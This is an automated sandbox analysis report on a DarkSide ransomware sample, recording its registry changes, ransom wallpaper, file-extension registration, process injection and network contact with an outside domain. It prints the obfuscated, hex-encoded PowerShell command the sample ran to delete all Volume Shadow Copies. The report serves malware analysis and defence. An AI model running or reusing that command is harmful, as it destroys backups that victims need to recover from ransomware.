Analysis Overview
SHA256
0c15eaa5c8a3d2bf981ad2e5be531fe760932cb4291038051b5a308c6a66e084
Threat Level: Known bad
The file 5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.zip was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Control Panel
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-11-17 16:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-11-17 16:09
Reported
2021-11-17 16:12
Platform
win7-en-20211014
Max time kernel
118s
Max time network
118s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\e0659d9c.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\e0659d9c.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.e0659d9c | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.e0659d9c\ = "e0659d9c" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\e0659d9c\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\e0659d9c | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\e0659d9c\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\e0659d9c.ico" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe
"C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.0.127.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
Files
memory/1360-55-0x0000000000400000-0x000000000083B000-memory.dmp
memory/1360-56-0x00000000002E8000-0x00000000002F3000-memory.dmp
memory/1360-57-0x0000000074F61000-0x0000000074F63000-memory.dmp
memory/1360-58-0x0000000000020000-0x0000000000030000-memory.dmp
memory/1360-59-0x0000000000400000-0x000000000083B000-memory.dmp
memory/1656-60-0x0000000000000000-mapping.dmp
memory/1656-61-0x000007FEFB831000-0x000007FEFB833000-memory.dmp
memory/1656-62-0x000007FEF2830000-0x000007FEF338D000-memory.dmp
memory/1656-63-0x0000000002A10000-0x0000000002A12000-memory.dmp
memory/1656-64-0x0000000002A12000-0x0000000002A14000-memory.dmp
memory/1656-65-0x0000000002A14000-0x0000000002A17000-memory.dmp
memory/1656-66-0x000000001B740000-0x000000001BA3F000-memory.dmp
memory/1656-67-0x0000000002A1B000-0x0000000002A3A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e1109cfb3b63e8242d63fcf292177f24 |
| SHA1 | 182470d69a047ed646adac9320757d58b9566475 |
| SHA256 | 4c8c819324494c14538ec0df9ef24e196d6d6d39e246af794fcf2867b6b93ae4 |
| SHA512 | ccb5ff8e586f9453c6f1e8e33a1a517bbe68a338a8853e393efac41ca72b54ac09e34c944f66674628794682fbae1b2716896054b636cdb8299e140e60f47af1 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-11-17 16:09
Reported
2021-11-17 16:12
Platform
win10-en-20211104
Max time kernel
105s
Max time network
123s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\438d7d9f.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\438d7d9f.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.438d7d9f | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.438d7d9f\ = "438d7d9f" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\438d7d9f\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\438d7d9f | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\438d7d9f\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\438d7d9f.ico" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2704 wrote to memory of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2704 wrote to memory of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe
"C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
